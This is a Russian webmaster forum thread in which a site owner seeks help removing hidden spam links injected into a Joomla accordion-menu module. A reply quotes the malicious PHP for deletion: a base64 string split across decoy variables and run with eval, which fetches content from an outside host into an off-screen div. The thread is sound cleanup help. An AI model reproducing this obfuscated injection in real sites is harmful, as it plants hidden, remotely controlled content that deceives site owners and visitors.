В общем, вчера нашел в сайте левые ссылки. _http://www.священный-коран.рф
Сайт на joomla.
Ссылки как то прикреплены к модулю аккордиону (слева), т.е. в страницах, где нет модуля нет ссылок.
сначала вручную покопался, ничего не нашел, потом по поиску попробовал стили, и т.д. по кускам - толка не было. Сейчас, по кодировкам ищу, пока без успешно.
Несколько вопросов:
1. Чем лучше искать? Я ищу на total , но бывало, что иногда он "не видит" того, что есть...
2. Где обычно прячут ссылки?
3. Как они так вставляют в сайт...замучили уже...
Кстати, сегодня обнаружил, что на другом сайте на том же хостинге тоже поставили те же ссылки. На хостинг пароль был простой, поменял.
Решил для себя - надо над безопасностью работать. Раньше не парился: появилась ссылка, ставил плагин для закрытия в noindex и все... Но так не хочется делать... так все ссылки перекрываются же..
06.09.2012 21:05Гуру
- Регистрация: 24.04.2011
- Сообщений: 801
- Репутация: 126
- 0
- 06.09.2012 21:37
Если он выскакивает в модуле аккордеоне, то и искать нужно пробовать именно там. Заходите в папку модулей Joomla по ftp и ищите там этот модуль. Скачиваете его и пробуйте искать. Если тотал коммандер не помогает, значит нужно искать закодированный текст вручную (скорее всего base64).
Если не сможете найти, можете кинуть модуль мне на почту (сообщу в личку, если нужно)- 0
- 07.09.2012 14:54
В файле MenuBase (mod_accordion_menu >> core >> MenuBase) попробуйте удалить строки:
PHP код:// Copyright (c) OFFLAJN.COM
$UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";
$MenuAcoAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";
$MenuAcoName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";
$MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";
$SystemJoCode = $UnixTimeLastEdit.$MenuAcoAuthor.$MenuAcoName.$MainDomain;
echo eval(base64_decode($SystemJoCode)); }
- 1
Спасибо сказали:
xilgiz(07.09.2012), - 07.09.2012 19:12Гуру
- Регистрация: 24.04.2011
- Сообщений: 801
- Репутация: 126
Все, и на втором сайте нашел ссылки - точно такие же.
Вот как они взламывают сайт то? Раньше сохранял в браузере пароли, сейчас перестал.
Через ftp total comander а тоже могут?- 0
- 07.09.2012 22:45
могут и через тотал коммандер, могут и через filezilla и через почту.... Этих способов очень много. Так же может быть такое, что взломали Вашего хостера, а Вы от этого пострадали.
- 0
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Снимаем покупные ссылки на сайт | Дайджест блогосферы | 4 | 09.06.2013 13:24 |
Ссылки какой тематики брать на сайт? | Вопросы от новичков | 8 | 22.12.2011 21:12 |
Ссылки на сайт, тематика кино | Ссылки, статьи | 1 | 05.09.2011 16:56 |
10 способов получить бесплатные ссылки на сайт | Дайджест блогосферы | 1 | 21.07.2010 12:58 |
addurl adsense cpa html proxy radikal wordpress yandex yandex.ru youtube zennoposter аккаунт баннер блог быть вконтакт год гугл деть добавить думать есть кейс ключ конечный контент магазин место может накрутка нужный отзыв оффера парсер партнёрка партнёрская программа первый программа продажа продвижение прокси просто работа работать регистрация рубль сайт сделать сервис скрипт сообщение софт ссылка стать страница трафик хороший хостинг цена яндекс
Тем:
77,580Сообщений:
762,964Пользователей:
30,080Сейчас на сайте:
0 пользователей и 228 гостей
